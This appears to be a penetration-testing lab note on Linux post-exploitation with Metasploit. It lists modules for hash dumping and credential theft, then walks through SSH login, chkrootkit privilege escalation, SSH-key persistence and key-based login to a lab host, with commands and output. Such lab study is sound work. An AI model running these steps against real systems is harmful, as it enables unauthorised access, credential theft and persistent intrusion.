Linux Post Exploitation
Linux Post Exploitation
Sections in This Note
Enumerating Linux System Information
- Enumerate system configuration
- Enumerate environment variables
- Enumerate network configuration
- VM check
- Enumerate user history
Some post exploits:
post/linux/gather/enum_configs
post/multi/gather/env
post/linux/gather/enum_network
post/linux/gather/enum_protections
post/linux/gather/enum_system
post/linux/gather/checkcontainer
post/linux/gather/checkvm
post/linux/gather/enum_users_history
post/multi/manage/system_session
post/linux/manage/download_exec
post/multi/gather/ssh_creds
post/multi/gather/docker_creds
post/linux/gather/hashdump
post/linux/gather/ecryptfs_creds
post/linux/gather/enum_psk
post/linux/gather/enum_xchat
post/linux/gather/phpmyadmin_credsteal
post/linux/gather/pptpd_chap_secrets
post/linux/manage/sshkey_persistence
Dumping Hashes with Hashdump
We can dump Linux user hashes with the hashdump post exploitation module. Linux password hashes are stored in /etc/shadow and can only be accessed by root or a user with root privileges. The hashdump module can dump user account hashes from /etc/shadow and can also unshadow hashes for password cracking with John the Ripper.
Establishing Persistence on Linux
msfconsole
# (consider SSH vulnerability)
use auxiliary/scanner/ssh/ssh_login
set USERNAME (name)
set PASSWORD (password)
exploit
sessions -u 1
In order to use the Metasploit persistence modules, we first need to elevate our privileges on the Linux target. The target has a vulnerable version of chkrootkit installed, vulnerable to privilege escalation, exploitable through a Metasploit module.
use exploit/unix/local/chkrootkit
set SESSION 2
set CHKROOTKIT /bin/chkrootkit
set LHOST (IPaddress)
exploit
sessions -u 3
Now that we've elevated our privileges, we can establish persistence. The best module for this is sshkey_persistence.
use post/linux/manage/sshkey_persistence
set SESSION 4 (session num)
set CREATESSHFOLDER true
exploit
loot
As shown, the loot command reveals the location of the private key that can be used to authenticate with the target system via SSH without providing a password.
msf5 post(linux/manage/sshkey_persistence) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.182.80.3 id_rsa ssh_id_rsa text/plain OpenSSH Private Key File /root/.msf4/loot/20211127225655_Linux_persistenc_192.182.80.3_id_rsa_891312.txt
In order to use the private key, view the content of the loot file, copy the key, and save it as a new file — in this case, in the home directory of the root user on Kali as ssh_key. Then assign appropriate permissions:
Command:
chmod 0400 ssh_key
Authenticate with the target using the private key via SSH:
Command:
ssh -i ssh_key root@192.182.80.3